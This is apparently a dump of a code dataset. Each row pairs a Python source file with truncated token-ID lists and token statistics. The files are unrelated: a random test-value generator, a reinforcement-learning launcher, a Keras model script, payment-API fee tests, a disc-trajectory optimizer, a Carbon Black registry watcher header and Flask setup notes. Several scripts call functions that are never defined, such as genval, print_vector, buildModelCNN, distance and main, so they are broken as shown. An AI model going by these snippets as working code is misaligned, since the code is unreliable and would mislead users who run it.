content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
#!/usr/bin/env python3 import random N = 32 M = 64 # NOTE: 0 is a reserved value randu = lambda x: random.randint(1, 2**x-1) randU32 = lambda: randu(32) randU64 = lambda: randu(64) fmt_by_dtype = { 'u32hex': '0x{:08x}', 'u64hex': '0x{:016x}', } cpp_by_dtype = { 'u32hex': 'uint32_t', 'u64hex': 'uint64_t', } # key = randU32() # vals = [(key, randU32(), randU64()) for _ in range(N)] # keys = [(x[0], x[1]) for x in vals] # success = [random.choice(vals) for _ in range(M)] # failure = [] keys = [(randU32(),) for _ in range(M)] vals = [(randU32(), randU64()) for _ in range(N)] miss = [(genval(),) for _ in range(M)] print('TEST_CASE("Insert random values and look them up", "[gentbl]")') print('{') print_vector(keys, name='keys', dtypes=['u32hex'], indent=4) print() print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4) print() print_vector(miss, name='miss', dtypes=['u32hex'], indent=4) print() print('}') # print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {") # for _ in range(N): # print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format( # randU32(), randU32(), randU64())) # print("};")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 628, 198, 11748, 4738, 628, 198, 45, 796, 3933, 198, 44, 796, 5598, 198, 2, 24550, 25, 657, 318, 257, 10395, 1988, 198, 25192, 84, 220, 220, 796, 37456, 2124, 25, 4738, 13, 25192, 6...
2.245714
525
"""Toy environment launcher. See the docs for more details about this environment. """ import sys import logging import numpy as np from deer.default_parser import process_args from deer.agent import NeuralAgent from deer.learning_algos.q_net_keras import MyQNetwork from Toy_env import MyEnv as Toy_env import deer.experiment.base_controllers as bc from deer.policies import EpsilonGreedyPolicy if __name__ == "__main__": logging.basicConfig(level=logging.INFO) # --- Parse parameters --- parameters = process_args(sys.argv[1:], Defaults) if parameters.deterministic: rng = np.random.RandomState(123456) else: rng = np.random.RandomState() # --- Instantiate environment --- env = Toy_env(rng) # --- Instantiate qnetwork --- qnetwork = MyQNetwork( env, parameters.rms_decay, parameters.rms_epsilon, parameters.momentum, parameters.clip_norm, parameters.freeze_interval, parameters.batch_size, parameters.update_rule, rng) train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1) test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.) # --- Instantiate agent --- agent = NeuralAgent( env, qnetwork, parameters.replay_memory_size, max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))), parameters.batch_size, rng, train_policy=train_policy, test_policy=test_policy) # --- Bind controllers to the agent --- # Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and # learning rate as well as the training epoch number. agent.attach(bc.VerboseController( evaluate_on='epoch', periodicity=1)) # During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes. # Plus, we also want to display after each training episode (!= than after every training) the average bellman # residual and the average of the V values obtained during the last episode, hence the two last arguments. 
agent.attach(bc.TrainerController( evaluate_on='action', periodicity=parameters.update_frequency, show_episode_avg_V_value=True, show_avg_Bellman_residual=True)) # Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we # wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given. agent.attach(bc.LearningRateController( initial_learning_rate=parameters.learning_rate, learning_rate_decay=parameters.learning_rate_decay, periodicity=1)) # Same for the discount factor. agent.attach(bc.DiscountFactorController( initial_discount_factor=parameters.discount, discount_factor_growth=parameters.discount_inc, discount_factor_max=parameters.discount_max, periodicity=1)) # As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy # policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more # precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every # episode or epoch (or never, hence the resetEvery='none'). agent.attach(bc.EpsilonController( initial_e=parameters.epsilon_start, e_decays=parameters.epsilon_decay, e_min=parameters.epsilon_min, evaluate_on='action', periodicity=1, reset_every='none')) # All previous controllers control the agent during the epochs it goes through. However, we want to interleave a # "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these # test epoch to interfere with the training of the agent, which is well established by the TrainerController, # EpsilonController and alike. Therefore, we will disable these controllers for the whole duration of the test # epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController. 
# The value of this argument is a list of the indexes of all controllers to disable, their index reflecting in # which order they were added. Here, "0" is refering to the firstly attached controller, thus the # VerboseController; "2" refers to the thirdly attached controller, thus the LearningRateController; etc. The order # in which the indexes are listed is not important. # For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True. # Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs] # *test* epochs. agent.attach(bc.InterleavedTestEpochController( id=0, epoch_length=parameters.steps_per_test, periodicity=1, show_score=True, summarize_every=parameters.period_btw_summary_perfs)) # --- Run the experiment --- agent.run(parameters.epochs, parameters.steps_per_epoch)
[ 37811, 48236, 2858, 24008, 13, 4091, 262, 34165, 329, 517, 3307, 546, 428, 2858, 13, 198, 198, 37811, 198, 198, 11748, 25064, 198, 11748, 18931, 198, 11748, 299, 32152, 355, 45941, 198, 198, 6738, 20096, 13, 12286, 62, 48610, 1330, 1429...
2.908593
1,827
# ------------------------------------------------------------------ # # RDF and CN related analysis # # ------------------------------------------------------------------ import sys py_path = '../../../../postprocessing/' sys.path.insert(0, py_path) py_path = '../../../../postprocessing/io_operations/' sys.path.insert(0, py_path) import cn_and_rdf_lmp as crl import io_module as io # # Input # # RDF and CN intput file rdf_file = '../nafion.rdf' # Output file out_file = 'rdf_cn_averaged.txt' # Number of bins nbins = 300 # Number of columns ncols = 10 crl.compute_time_average(rdf_file, out_file, nbins, ncols)
[ 2, 16529, 438, 198, 2, 198, 2, 197, 49, 8068, 290, 31171, 3519, 3781, 197, 198, 2, 198, 2, 16529, 438, 198, 198, 11748, 25064, 198, 9078, 62, 6978, 796, 705, 40720, 40720, 40720, 40720, 7353, 36948, 14, 6, 198, 17597, 13, 6978, 13...
2.911628
215
from ..doctools import document from .geom import geom from .geom_path import geom_path from .geom_point import geom_point from .geom_linerange import geom_linerange
[ 6738, 11485, 4598, 310, 10141, 1330, 3188, 198, 6738, 764, 469, 296, 1330, 4903, 296, 198, 6738, 764, 469, 296, 62, 6978, 1330, 4903, 296, 62, 6978, 198, 6738, 764, 469, 296, 62, 4122, 1330, 4903, 296, 62, 4122, 198, 6738, 764, 469,...
3.092593
54
#!/usr/bin/python # -*- coding: utf-8 -*- __author__ = 'ar' import json import os import skimage.io as skio import matplotlib.pyplot as plt import numpy as np import keras from keras.models import Model from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense from keras.utils.visualize_util import plot as kplot ################################## ################################## ################################## if __name__ == '__main__': model = buildModelCNN(inpShape=(3, 128, 128)) fimgModel = 'keras-model-cnn.jpg' kplot(model, fimgModel, show_shapes=True) # plt.imshow(skio.imread(fimgModel)) # plt.show() model.summary() print ('------') numLayers = len(model.layers) for ii,ll in enumerate(model.layers): print ('[%d/%d] : %s' % (ii, numLayers, ll)) modelJson = generateModelJsonDict(model) print ('----------------------') print (json.dumps(modelJson, indent=4)) foutJson = 'test-model-cnn.json' with open(foutJson, 'w') as f: json.dump(modelJson, f, indent=4) # print (json.dumps(modelJson, indent=4))
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 834, 9800, 834, 796, 705, 283, 6, 198, 198, 11748, 33918, 198, 11748, 28686, 198, 11748, 1341, 9060, 13, 952, 355, 1341, 952...
2.561644
438
""" Test the integrations related to the internal interface implementation and the 'Interface' interface itself """ import pytest from cppython_core.schema import InterfaceConfiguration from pytest_cppython.plugin import InterfaceIntegrationTests from cppython.console import ConsoleInterface
[ 37811, 198, 14402, 262, 4132, 9143, 3519, 284, 262, 5387, 7071, 7822, 290, 262, 705, 39317, 6, 7071, 2346, 198, 37811, 198, 198, 11748, 12972, 9288, 198, 6738, 269, 381, 7535, 62, 7295, 13, 15952, 2611, 1330, 26491, 38149, 198, 6738, ...
4.484848
66
#@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology #@version 1.0 #@date 2021-08-17 #Influence-guided Data Augmentation for Neural Tensor Completion (DAIN) #This software is free of charge under research purposes. #For commercial purposes, please contact the main author. import torch from torch import nn from torch.utils.data import Dataset, DataLoader import argparse import numpy as np from dataset import TensorDataset import torch.optim as optim from model import MLP import pandas as pd import copy import random from sklearn.model_selection import train_test_split import os if __name__ == "__main__": main()
[ 2, 31, 32057, 220, 220, 220, 1001, 73, 2049, 3966, 357, 568, 71, 31496, 31, 10494, 354, 13, 15532, 828, 7859, 5136, 286, 8987, 198, 2, 31, 9641, 220, 220, 220, 352, 13, 15, 198, 2, 31, 4475, 220, 220, 220, 220, 220, 220, 33448, ...
3.288557
201
# Copyright 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests to assure the fees end-point. Test-Suite to ensure that the /fees endpoint is working as expected. """ import json from datetime import date, timedelta from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType from pay_api.schemas import utils as schema_utils from pay_api.utils.enums import Role from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header def test_fees_with_corp_type_and_filing_type(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app): """Assert that the endpoint returns 200.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() 
factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert not schema_utils.validate(rv.json, 'problem')[0] def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app): """Assert that the endpoint returns 400.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now + timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 400 assert schema_utils.validate(rv.json, 'problem')[0] assert not schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app): """Assert that the endpoint returns 200.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(1), now) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app): 
"""Assert that the endpoint returns 400.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(2), now - timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 400 assert schema_utils.validate(rv.json, 'problem')[0] def test_calculate_fees_with_waive_fees(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(role='staff'), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 0 def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 100 def 
test_fees_with_quantity(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_calculate_fees_for_service_fee(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' service_fee = factory_fee_model('SF01', 1.5) factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), service_fee=service_fee) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 100 assert rv.json.get('serviceFees') == 1.5 def test_calculate_fees_with_zero_service_fee(session, client, jwt, app): """Assert that service fee is zero if the filing fee is zero.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 0)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 0 assert 
rv.json.get('serviceFees') == 0 def test_fee_for_account_fee_settings(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()), headers=headers) account_id = rv.json.get('authAccountId') # Create account fee details. token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [ { 'applyFilingFees': False, 'serviceFeeCode': 'TRF02', # 1.0 'product': 'BUSINESS' } ]}), headers=headers) # Get fee for this account. token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id} rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] # assert filing fee is not applied and service fee is applied assert rv.json.get('filingFees') == 0 assert rv.json.get('serviceFees') == 1.0 # Now change the settings to apply filing fees and assert token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({ 'applyFilingFees': True, 'serviceFeeCode': 'TRF01', # 1.5 'product': 'BUSINESS' }), headers=headers) # Get fee for this account. 
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id} rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] # assert filing fee is applied and service fee is applied assert rv.json.get('filingFees') > 0 assert rv.json.get('serviceFees') == 1.5 def factory_filing_type_model( filing_type_code: str, filing_description: str = 'TEST'): """Return the filing type model.""" filing_type = FilingType(code=filing_type_code, description=filing_description) filing_type.save() return filing_type def factory_fee_model( fee_code: str, amount: int): """Return the fee code model.""" fee_code_master = FeeCode(code=fee_code, amount=amount) fee_code_master.save() return fee_code_master def factory_corp_type_model( corp_type_code: str, corp_type_description: str): """Return the corp type model.""" corp_type = CorpType(code=corp_type_code, description=corp_type_description) corp_type.save() return corp_type def factory_fee_schedule_model( filing_type: FilingType, corp_type: CorpType, fee_code: FeeCode, fee_start_date: date = date.today(), fee_end_date: date = None, service_fee: FeeCode = None): """Return the fee schedule model.""" fee_schedule = FeeSchedule(filing_type_code=filing_type.code, corp_type_code=corp_type.code, fee_code=fee_code.code, fee_start_date=fee_start_date, fee_end_date=fee_end_date ) if service_fee: fee_schedule.service_fee_code = service_fee.code fee_schedule.save() return fee_schedule
[ 2, 15069, 220, 13130, 22783, 286, 3517, 9309, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, ...
2.393301
5,314
from datetime import datetime, timedelta import jwt from flask import current_app from app import db from app.user.repository import UserRepository
[ 6738, 4818, 8079, 1330, 4818, 8079, 11, 28805, 12514, 198, 198, 11748, 474, 46569, 198, 6738, 42903, 1330, 1459, 62, 1324, 198, 198, 6738, 598, 1330, 20613, 198, 6738, 598, 13, 7220, 13, 260, 1930, 37765, 1330, 11787, 6207, 13264, 628 ]
3.682927
41
import _init_paths import argparse import random import time import utils import os from collections import defaultdict import numpy as np import csv from progress.bar import IncrementalBar from utils.hash import * if __name__ == '__main__': main()
[ 11748, 4808, 15003, 62, 6978, 82, 198, 11748, 1822, 29572, 198, 11748, 4738, 198, 11748, 640, 198, 11748, 3384, 4487, 198, 11748, 28686, 198, 6738, 17268, 1330, 4277, 11600, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 269, 21370, 198,...
3.350649
77
import math from pprint import pprint import matplotlib.pyplot as plt from scipy.optimize import minimize from frispy import Disc from frispy import Discs from frispy import Model model = Discs.roc mph_to_mps = 0.44704 v = 56 * mph_to_mps rot = -v / model.diameter ceiling = 4 # 4 meter ceiling tunnel_width = 4 # 4 meter wide tunnel bnds = [(-90, 90)] * 3 x0 = [6, -3, 10] res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True}) pprint(res) a, nose_up, hyzer = res.x disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v, "nose_up": nose_up, "hyzer": hyzer}) result = disc.compute_trajectory(15.0, **{"max_step": .2}) times = result.times t, x, y, z = result.times, result.x, result.y, result.z #plt.plot(x, y) #plt.plot(x, z) #plt.plot(t, x) plt.plot(t, y) plt.plot(t, z) pprint(x[-1] * 3.28084) # feet plt.show()
[ 11748, 10688, 198, 6738, 279, 4798, 1330, 279, 4798, 198, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 629, 541, 88, 13, 40085, 1096, 1330, 17775, 198, 198, 6738, 1216, 8802, 88, 1330, 8444, 198, 6738, 1216...
2.22695
423
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
[ 2, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 220, 220, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 220, 220, 921, 743, 7330, 257, 4866,...
3.473118
186
import os from Bio import AlignIO, Phylo from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
[ 11748, 28686, 198, 6738, 16024, 1330, 978, 570, 9399, 11, 1380, 2645, 78, 198, 6738, 16024, 13, 2725, 2645, 78, 13, 27660, 36687, 1330, 34600, 9771, 3129, 1352, 11, 34600, 27660, 42316, 273 ]
3.727273
33
#!/usr/bin/env python # #The MIT License (MIT) # # Copyright (c) 2015 Bit9 + Carbon Black # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # ----------------------------------------------------------------------------- # Extension regmod watcher and grabber # # This script listens to the CB messaging bus for registry modification events, # and when a modification is seen that matches a regular expression from a file # of registry path regular expressions, it goes and grabs the registry value # using CB Live Response. # # You need to make sure rabbitmq is enabled in cb.conf, and you might need to # open a firewall rule for port 5004. You also will need to enable regmod # in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed # here, you'll have to do service cb-enterprise restart. 
# # TODO: More error handling, more performance improvements # # last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com) # import re import Queue import sys from threading import Thread import time import traceback try: from cbapi.legacy.util.cli_helpers import main_helper from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor import cbapi.legacy.util.sensor_events_pb2 as cpb except ImportError: from cbapi.util.cli_helpers import main_helper from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor import cbapi.util.sensor_events_pb2 as cpb if __name__ == "__main__": ## YOU CAN USE data/autoruns_regexes.txt to test ## required_args =[("-i", "--username", "store", None, "username", "CB messaging username"), ("-p", "--password", "store", None, "password", "CB messaging password"), ("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")] optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")] main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.", main, custom_required=required_args, custom_optional=optional_args)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 464, 17168, 13789, 357, 36393, 8, 198, 2, 198, 2, 15069, 357, 66, 8, 1853, 4722, 24, 1343, 23699, 2619, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 38...
3.255
1,000
# -*- coding: utf-8 -*- """Exceptions raised by the h application.""" from __future__ import unicode_literals from h.i18n import TranslationString as _ # N.B. This class **only** covers exceptions thrown by API code provided by # the h package. memex code has its own base APIError class.
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 3109, 11755, 4376, 416, 262, 289, 3586, 526, 15931, 198, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 289, 13, 72, 1507, ...
3.325843
89
#!/usr/bin/env python # Copyright (c) 2018 Orange and others. # # All rights reserved. This program and the accompanying materials # are made available under the terms of the Apache License, Version 2.0 # which accompanies this distribution, and is available at # http://www.apache.org/licenses/LICENSE-2.0 """ Shaker_ wraps around popular system network testing tools like iperf, iperf3 and netperf (with help of flent). Shaker is able to deploy OpenStack instances and networks in different topologies. Shaker scenario specifies the deployment and list of tests to execute. .. _Shaker: http://pyshaker.readthedocs.io/en/latest/ """ import logging import os import json import scp from functest.core import singlevm from functest.utils import env
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 2864, 11942, 290, 1854, 13, 198, 2, 198, 2, 1439, 2489, 10395, 13, 770, 1430, 290, 262, 19249, 5696, 198, 2, 389, 925, 1695, 739, 262, 2846, 286, 262, ...
3.561321
212
import torch import functools if torch.__version__.startswith('0'): from .sync_bn.inplace_abn.bn import InPlaceABNSync BatchNorm2d = functools.partial(InPlaceABNSync, activation='none') BatchNorm2d_class = InPlaceABNSync relu_inplace = False else: # BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d relu_inplace = True
[ 11748, 28034, 198, 11748, 1257, 310, 10141, 198, 198, 361, 28034, 13, 834, 9641, 834, 13, 9688, 2032, 342, 10786, 15, 6, 2599, 198, 220, 220, 220, 422, 764, 27261, 62, 9374, 13, 259, 5372, 62, 397, 77, 13, 9374, 1330, 554, 27271, ...
2.440476
168
from django.db import models from ordered_model.models import OrderedModel, OrderedModelBase
[ 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 6149, 62, 19849, 13, 27530, 1330, 14230, 1068, 17633, 11, 14230, 1068, 17633, 14881, 628, 628, 628, 628, 628 ]
3.642857
28
import os import sys import numpy as np import pandas as pd def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame: """ @param totals_column: (default = use sum of columns) @param percent_names: Rename names from 'col' => 'col %' Return a dataframe as a percentage of totals_column if provided, or sum of columns """ percent_df = pd.DataFrame(index=df.index) columns = df.columns if totals_column: totals_series = df[totals_column] columns = columns - [totals_column] else: totals_series = df.sum(axis=1) for col in columns: new_col = col if percent_names: new_col = f"{new_col} %" multiplier = 100.0 # to get percent percent_df[new_col] = multiplier * df[col] / totals_series return percent_df def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame: """ Return a dataframe as a percentage of sum of rows """ row_sums = df.sum(axis=0) return df.multiply(100.0) / row_sums def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame: """ Return a dataframe as a percentage of sum of rows """ total = df.sum(axis=0).sum() return df.multiply(100.0) / total
[ 11748, 28686, 198, 11748, 25064, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 628, 198, 4299, 651, 62, 28665, 82, 62, 25067, 62, 7890, 14535, 7, 7568, 25, 279, 67, 13, 6601, 19778, 11, 26310, 62, 28...
2.516832
505
from app.db import db # Ignore it if db can't find the row when updating/deleting # Todo: not ignore it, raise some error, remove checkers in view
[ 6738, 598, 13, 9945, 1330, 20613, 628, 198, 2, 41032, 340, 611, 20613, 460, 470, 1064, 262, 5752, 618, 19698, 14, 2934, 293, 889, 198, 2, 309, 24313, 25, 407, 8856, 340, 11, 5298, 617, 4049, 11, 4781, 2198, 364, 287, 1570, 198 ]
3.465116
43
""" How to set up virtual environment pip install virtualenv pip install virtualenvwrapper # export WORKON_HOME=~/Envs source /usr/local/bin/virtualenvwrapper.sh # To activate virtualenv and set up flask 1. mkvirtualenv my-venv ###2. workon my-venv 3. pip install Flask 4. pip freeze 5. # To put all dependencies in a file pip freeze > requirements.txt 6. run.py: entry point of the application 7. relational database management system SQLite, MYSQL, PostgreSQL SQLAlchemy is an Object Relational Mapper (ORM), which means that it connects the objects of an application to tables in a relational database management system. """
